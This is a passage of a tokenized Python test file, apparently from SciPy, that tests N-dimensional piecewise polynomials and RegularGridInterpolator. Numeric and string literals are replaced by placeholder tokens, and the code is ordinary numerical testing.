, <NUM_LIT:5> ) , x ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:2> ] ) <EOL> dp1 = p1 . derivative ( <NUM_LIT:2> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) , y ) <EOL> dp = p . antiderivative ( nu = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> dp1 = p1 . antiderivative ( <NUM_LIT:1> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . 
transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ) , z ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] ) <EOL> dp1 = p1 . derivative ( <NUM_LIT:3> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> def test_deriv_3d_simple ( self ) : <EOL> c = np . ones ( ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> ip = p . antiderivative ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> ) ) <EOL> ip = ip . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> xi = np . random . rand ( <NUM_LIT:20> ) <EOL> yi = np . random . rand ( <NUM_LIT:20> ) <EOL> zi = np . random . rand ( <NUM_LIT:20> ) <EOL> assert_allclose ( ip ( ( xi , yi , zi ) ) , <EOL> xi * yi ** <NUM_LIT:2> * zi ** <NUM_LIT:4> / ( gamma ( <NUM_LIT:3> ) * gamma ( <NUM_LIT:5> ) ) ) <EOL> def test_integrate_2d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:16> , <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:16> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> c = c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> cx = c . reshape ( c . shape [ <NUM_LIT:0> ] , c . shape [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) . copy ( ) <EOL> _ppoly . 
fix_continuity ( cx , x , <NUM_LIT:2> ) <EOL> c = cx . reshape ( c . shape ) <EOL> c = c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> c = c . transpose ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> cx = c . reshape ( c . shape [ <NUM_LIT:0> ] , c . shape [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) . copy ( ) <EOL> _ppoly . fix_continuity ( cx , y , <NUM_LIT:2> ) <EOL> c = cx . reshape ( c . shape ) <EOL> c = c . transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ) . copy ( ) <EOL> p = NdPPoly ( c , ( x , y ) ) <EOL> for ranges in [ [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] , <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:0.5> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] , <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:0.5> ) ] , <EOL> [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] ] : <EOL> ig = p . integrate ( ranges ) <EOL> ig2 , err2 = nquad ( lambda x , y : p ( ( x , y ) ) , ranges , <EOL> opts = [ dict ( epsrel = <NUM_LIT> , epsabs = <NUM_LIT> ) ] * <NUM_LIT:2> ) <EOL> assert_allclose ( ig , ig2 , rtol = <NUM_LIT> , atol = <NUM_LIT> , <EOL> err_msg = repr ( ranges ) ) <EOL> def test_integrate_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:16> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> u = np . random . rand ( <NUM_LIT:200> ) <EOL> v = np . random . rand ( <NUM_LIT:200> ) <EOL> a , b = <NUM_LIT> , <NUM_LIT> <EOL> px = p . integrate_1d ( a , b , axis = <NUM_LIT:0> ) <EOL> pax = p . 
antiderivative ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> assert_allclose ( px ( ( u , v ) ) , pax ( ( b , u , v ) ) - pax ( ( a , u , v ) ) ) <EOL> py = p . integrate_1d ( a , b , axis = <NUM_LIT:1> ) <EOL> pay = p . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> assert_allclose ( py ( ( u , v ) ) , pay ( ( u , b , v ) ) - pay ( ( u , a , v ) ) ) <EOL> pz = p . integrate_1d ( a , b , axis = <NUM_LIT:2> ) <EOL> paz = p . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> assert_allclose ( pz ( ( u , v ) ) , paz ( ( u , v , b ) ) - paz ( ( u , v , a ) ) ) <EOL> def _ppoly_eval_1 ( c , x , xps ) : <EOL> """<STR_LIT>""" <EOL> out = np . zeros ( ( len ( xps ) , c . shape [ <NUM_LIT:2> ] ) ) <EOL> for i , xp in enumerate ( xps ) : <EOL> if xp < <NUM_LIT:0> or xp > <NUM_LIT:1> : <EOL> out [ i , : ] = np . nan <EOL> continue <EOL> j = np . searchsorted ( x , xp ) - <NUM_LIT:1> <EOL> d = xp - x [ j ] <EOL> assert_ ( x [ j ] <= xp < x [ j + <NUM_LIT:1> ] ) <EOL> r = sum ( c [ k , j ] * d ** ( c . shape [ <NUM_LIT:0> ] - k - <NUM_LIT:1> ) <EOL> for k in range ( c . shape [ <NUM_LIT:0> ] ) ) <EOL> out [ i , : ] = r <EOL> return out <EOL> def _ppoly_eval_2 ( coeffs , breaks , xnew , fill = np . nan ) : <EOL> """<STR_LIT>""" <EOL> a = breaks [ <NUM_LIT:0> ] <EOL> b = breaks [ - <NUM_LIT:1> ] <EOL> K = coeffs . shape [ <NUM_LIT:0> ] <EOL> saveshape = np . shape ( xnew ) <EOL> xnew = np . ravel ( xnew ) <EOL> res = np . empty_like ( xnew ) <EOL> mask = ( xnew >= a ) & ( xnew <= b ) <EOL> res [ ~ mask ] = fill <EOL> xx = xnew . compress ( mask ) <EOL> indxs = np . searchsorted ( breaks , xx ) - <NUM_LIT:1> <EOL> indxs = indxs . clip ( <NUM_LIT:0> , len ( breaks ) ) <EOL> pp = coeffs <EOL> diff = xx - breaks . take ( indxs ) <EOL> V = np . vander ( diff , N = K ) <EOL> values = np . array ( [ np . dot ( V [ k , : ] , pp [ : , indxs [ k ] ] ) for k in xrange ( len ( xx ) ) ] ) <EOL> res [ mask ] = values <EOL> res . 
shape = saveshape <EOL> return res <EOL> def _dpow ( x , y , n ) : <EOL> """<STR_LIT>""" <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif n > y : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return poch ( y - n + <NUM_LIT:1> , n ) * x ** ( y - n ) <EOL> def _ppoly2d_eval ( c , xs , xnew , ynew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> nx , ny = c . shape [ : <NUM_LIT:2> ] <EOL> for jout , ( x , y ) in enumerate ( zip ( xnew , ynew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> val += ( c [ nx - k1 - <NUM_LIT:1> , ny - k2 - <NUM_LIT:1> , j1 , j2 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> def _ppoly3d_eval ( c , xs , xnew , ynew , znew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> nx , ny , nz = c . 
shape [ : <NUM_LIT:3> ] <EOL> for jout , ( x , y , z ) in enumerate ( zip ( xnew , ynew , znew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] <= z <= xs [ <NUM_LIT:2> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> j3 = np . searchsorted ( xs [ <NUM_LIT:2> ] , z ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> s3 = z - xs [ <NUM_LIT:2> ] [ j3 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> for k3 in range ( c . shape [ <NUM_LIT:2> ] ) : <EOL> val += ( c [ nx - k1 - <NUM_LIT:1> , ny - k2 - <NUM_LIT:1> , nz - k3 - <NUM_LIT:1> , j1 , j2 , j3 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) <EOL> * _dpow ( s3 , k3 , nu [ <NUM_LIT:2> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> def _ppoly4d_eval ( c , xs , xnew , ynew , znew , unew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> mx , my , mz , mu = c . 
shape [ : <NUM_LIT:4> ] <EOL> for jout , ( x , y , z , u ) in enumerate ( zip ( xnew , ynew , znew , unew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] <= z <= xs [ <NUM_LIT:2> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:3> ] [ <NUM_LIT:0> ] <= u <= xs [ <NUM_LIT:3> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> j3 = np . searchsorted ( xs [ <NUM_LIT:2> ] , z ) - <NUM_LIT:1> <EOL> j4 = np . searchsorted ( xs [ <NUM_LIT:3> ] , u ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> s3 = z - xs [ <NUM_LIT:2> ] [ j3 ] <EOL> s4 = u - xs [ <NUM_LIT:3> ] [ j4 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> for k3 in range ( c . shape [ <NUM_LIT:2> ] ) : <EOL> for k4 in range ( c . shape [ <NUM_LIT:3> ] ) : <EOL> val += ( c [ mx - k1 - <NUM_LIT:1> , my - k2 - <NUM_LIT:1> , mz - k3 - <NUM_LIT:1> , mu - k4 - <NUM_LIT:1> , j1 , j2 , j3 , j4 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) <EOL> * _dpow ( s3 , k3 , nu [ <NUM_LIT:2> ] ) <EOL> * _dpow ( s4 , k4 , nu [ <NUM_LIT:3> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> class TestRegularGridInterpolator ( TestCase ) : <EOL> def _get_sample_4d ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:4> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . 
newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def _get_sample_4d_2 ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:2> + [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> ) ] * <NUM_LIT:2> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def test_list_input ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> interp = RegularGridInterpolator ( points , <EOL> values . tolist ( ) , <EOL> method = method ) <EOL> v1 = interp ( sample . tolist ( ) ) <EOL> interp = RegularGridInterpolator ( points , <EOL> values , <EOL> method = method ) <EOL> v2 = interp ( sample ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_complex ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> values = values - <NUM_LIT> * values <EOL> sample = np . 
asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> interp = RegularGridInterpolator ( points , values , <EOL> method = method ) <EOL> rinterp = RegularGridInterpolator ( points , values . real , <EOL> method = method ) <EOL> iinterp = RegularGridInterpolator ( points , values . imag , <EOL> method = method ) <EOL> v1 = interp ( sample ) <EOL> v2 = rinterp ( sample ) + <NUM_LIT> * iinterp ( sample ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_linear_xi1d ( self ) : <EOL> points , values = self . _get_sample_4d_2 ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_linear_xi3d ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_nearest ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . 
asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:0.1> ] ) <EOL> wanted = <NUM_LIT:0.> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ) <EOL> wanted = <NUM_LIT:0.> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_linear_edges ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_valid_create ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> ) ] <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis ] <EOL> values1 = values [ np . 
newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> ) <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values , <EOL> method = "<STR_LIT>" ) <EOL> def test_valid_call ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> assert_raises ( ValueError , interp , sample , "<STR_LIT>" ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> assert_raises ( ValueError , interp , sample ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] ] ) <EOL> assert_raises ( ValueError , interp , sample ) <EOL> def test_out_of_bounds_extrap ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , <EOL> fill_value = None ) <EOL> sample = np . 
asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> ] , [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> wanted = np . asarray ( [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> def test_out_of_bounds_extrap2 ( self ) : <EOL> points , values = self . _get_sample_4d_2 ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , <EOL> fill_value = None ) <EOL> sample = np . asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> ] , [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> wanted = np . asarray ( [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> def test_out_of_bounds_fill ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , <EOL> fill_value = np . nan ) <EOL> sample = np . asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ np . nan , np . nan , np . 
nan ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_nearest_compare_qhull ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> points_qhull = itertools . product ( * points ) <EOL> points_qhull = [ p for p in points_qhull ] <EOL> points_qhull = np . asarray ( points_qhull ) <EOL> values_qhull = values . reshape ( - <NUM_LIT:1> ) <EOL> interp_qhull = NearestNDInterpolator ( points_qhull , values_qhull ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , interp_qhull ( sample ) ) <EOL> def test_linear_compare_qhull ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> points_qhull = itertools . product ( * points ) <EOL> points_qhull = [ p for p in points_qhull ] <EOL> points_qhull = np . asarray ( points_qhull ) <EOL> values_qhull = values . reshape ( - <NUM_LIT:1> ) <EOL> interp_qhull = LinearNDInterpolator ( points_qhull , values_qhull ) <EOL> sample = np . 
